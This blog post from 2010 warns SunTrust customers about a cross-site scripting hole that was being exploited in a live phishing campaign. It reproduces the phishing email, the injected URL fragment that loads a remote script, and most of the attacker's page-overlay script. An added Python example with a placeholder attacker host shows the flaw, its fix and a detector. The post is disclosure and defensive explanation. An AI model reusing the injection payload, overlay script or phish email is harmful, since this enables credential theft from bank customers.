Franklin Veaux (tacit) wrote,

OUCH! SunTrust's Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what's called a "cross site scripting" attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal's servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

you will be taken to the Web site, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust's IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you'll see a red Web page reading "The cross-site scripting vulnerability at IS STILL ACTIVE". What's going on?

What's going on is that can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don't have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the "remember me" checkbox on SunTrust's login page.

In English, that means you cannot trust anything you see displayed at, even if you are 100% positive that the URL of your browser is in fact It is trivial to create malicious links that change the content displayed at, as I have shown in my example. This security hole is currently being used in a "phishing" attack that shows you what looks like a perfectly legitimate login page at, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

The attack is currently using a phony email with the title "Your account records have not been updated for too long". This email looks like a bog-standard phishing attack of the kind we all see fifteen or twenty times a day. The full email looks like this:

Return-Path: <>
Received: from ( []) by (v129.4) with ESMTP id MAILINDE061-5eb64bf34aeb237; Tue, 18 May 2010 22:20:27 -0400
Received: from ( [])
by (Internet Inbound) with ESMTP id 521D03800009D
for <>; Tue, 18 May 2010 22:20:27 -0400 (EDT)
Received: from saojorge by with local (Exim 4.69)
(envelope-from <>)
id 1OEVAI-0005bM-Di
for; Tue, 18 May 2010 19:21:06 -0300
Subject: Your account records have not been updated for too long
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: SunTrust <>
Message-Id: <>
Date: Tue, 18 May 2010 19:21:06 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname -
X-AntiAbuse: Original Domain -
X-AntiAbuse: Originator/Caller UID/GID - [1063 32007] / [47 12]
X-AntiAbuse: Sender Address Domain -
x-aol-global-disposition: S
x-aol-sid: 3039ac1d60584bf34aeb424c
X-Mailer: Unknown (No Version)

<div style="padding:15px;font-family:arial;font-size:12px"><p style="margin:0 0 15px 0"><b>Hello tacitr,</b></p>
<p style="margin:0 0 20px 0"><span style="font-size:14px;color:red"><b>Your account records haven't been updated for too long</b></span><br><br>
Please note that some of your personal information might be outdated.<br>To reactivate your account, please visit our Help Center:</p>
<p style="margin:0 0 20px 0"><a href="" target="_blank"></a></p><p style="margin:0 0 20px 0">Best regards,<br>SunTrust Customer Service<br><br>
<span style="color:gray">SunTrust Bank,<br>P.O. Box 4418 GA-Atlanta-0795,<br>Atlanta, GA 30302-4418</span></p></div>

The interesting thing you will notice about this phish, which makes it very different from garden-variety phishing attacks, is that it actually contains a real SunTrust URL. The SunTrust Web page at

contains a type of security hole known as a "cross-site scripting flaw". In simple terms, it means that the Web page is poorly created in such a way that I can trick it into loading and running a JavaScript from anywhere on the Web.

In this case, what happens is that the Web page at is being used to load and run a JavaScript located at Look closely at the URL in the attack email. See all the junk after the question mark? Most of that junk is bogus, just there to throw off non-technical Web users.

The URL in the email can be divided into several parts: so on)...&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http:// so on)...

The stuff in blue is the SunTrust Web page. The stuff after that is made up of things that are given to the Web page so that it knows what to do. Normally, it would just be the first part in red, which I imagine would be a number corresponding to a text file to display.

Ah, but the part in green...

The Web designers at SunTrust did not check to see what was being passed to the Web page. The Web page will blindly accept and execute anything that it is passed. The part in green is the address of a malicious JavaScript. When it is passed to the Web page, the Web page executes the script, without regard to where it came from, and displays the result.
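To make the mechanism concrete, here is an added example (written for this page, not SunTrust's code and not the attacker's) that models the reflection flaw described above. It assumes a hypothetical page template that drops the TOPNAME value into an anchor-tag attribute, and it uses a constructed TOPNAME value modelled on the percent-encoded fragment quoted in the email URL; the script host "attacker.example" is a placeholder, not the address from the real attack. The vulnerable renderer sits beside the fixed one, and a small defensive check decodes query parameters the way a proxy or log reviewer would to spot the injected tag.

```python
import html
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample modelled on the percent-encoded fragment quoted in the post
# ("...&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://..."). The host
# "attacker.example" is a placeholder, not the server used in the real attack.
ATTACK_TOPNAME = (
    "%22%3E%3C/a%3E%3Cscript%20src=%22http://attacker.example/x.js%22%3E%3C/script%3E"
)


def render_vulnerable(topname: str) -> str:
    """Assumed template: the TOPNAME value is dropped straight into an attribute
    of an anchor tag, the kind of unchecked reflection the post describes.
    A value beginning with "> closes the attribute and the tag, so whatever
    follows it (here a <script> tag) becomes live markup in the page."""
    return f'<a href="/help" name="{topname}">Help</a>'


def render_fixed(topname: str) -> str:
    """Same template, but the value is HTML-attribute-escaped first, so quotes
    and angle brackets are rendered as text and cannot start a new tag."""
    return f'<a href="/help" name="{html.escape(topname, quote=True)}">Help</a>'


def contains_script_tag(markup: str) -> bool:
    """True if the rendered markup contains a real <script ...> start tag."""
    return "<script" in markup.lower()


def suspicious_params(url: str) -> list:
    """Defensive check for a proxy or log review: decode every query parameter
    (a second time on top of parse_qs, to catch double-encoding) and report
    the names of parameters whose decoded value carries tag characters."""
    flagged = []
    for name, values in parse_qs(urlparse(url).query).items():
        for value in values:
            decoded = unquote(value)
            if "<" in decoded or ">" in decoded:
                flagged.append(name)
                break
    return flagged


if __name__ == "__main__":
    payload = unquote(ATTACK_TOPNAME)
    print("vulnerable:", render_vulnerable(payload))
    print("fixed:     ", render_fixed(payload))
    sample_url = "https://bank.example/page?TEXTID=123&TOPNAME=" + ATTACK_TOPNAME
    print("flagged parameters:", suspicious_params(sample_url))
```

Running it prints the vulnerable rendering with a live script tag, the fixed rendering with the same bytes neutralised as `&quot;&gt;&lt;/a&gt;&lt;script ...`, and `['TOPNAME']` as the flagged parameter. The fix is the only change between the two renderers: escaping output in the context it lands in (here an HTML attribute) is what the SunTrust page was missing.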

Here are the contents of the malicious script:

document.title = 'SunTrust - Identification';

document.write('html {');
document.write('height: 100%;');
document.write('overflow: hidden;');
document.write('body {');
document.write('overflow: hidden;');
document.write('height: 100%;');
document.write('margin: 0;');
document.write('iframe {');
document.write('border: 0;');
document.write('overflow: auto;');
document.write('overflow-x: hidden;');
document.write('margin: 0;');
document.write('width: 100%;');
document.write('height: 100%;');
document.write('body table {');
document.write('display: none;');

document.write('<iframe id="mainframe" name="mainframe" src="" frameborder="0" border="0"></iframe>');

window.onload = function() {
var frm = document.getElementById('mainframe');

If you don't know JavaScript, basically what this script instructs the page to do is:

1. Change the title of the page to read "SunTrust: identification";
2. Hide the content of the page;
3. Load new content from and show it.

The Web site at is a hacked site that the hacker has placed a phish page on. So the email contains a real SunTrust Web site address, with instructions to load a script that will blank out the page and replace it with the phish page. The hacker's phish page also attempts to load any SunTrust cookies, if it can.

You can see the results by clicking on the link I've placed above, which replaces the script at with a script located on my server, which loads a red page reading "The cross-site scripting vulnerability at IS STILL ACTIVE." If you click on my link, you'll see the real SunTrust page load, then the screen will flicker as my script loads, then the page will turn red and show you the warning. If you just go to without any parameters, you'll see the page you should see. I've written to SunTrust to notify them that they have a security problem. Normally, I would not describe the problem or how it works until after they fix it. However, in this case, the security problem has already been discovered by the hacker underground and is being used in current, active attacks, so attempting to keep it secret at this point is pretty useless.
Tags: computer security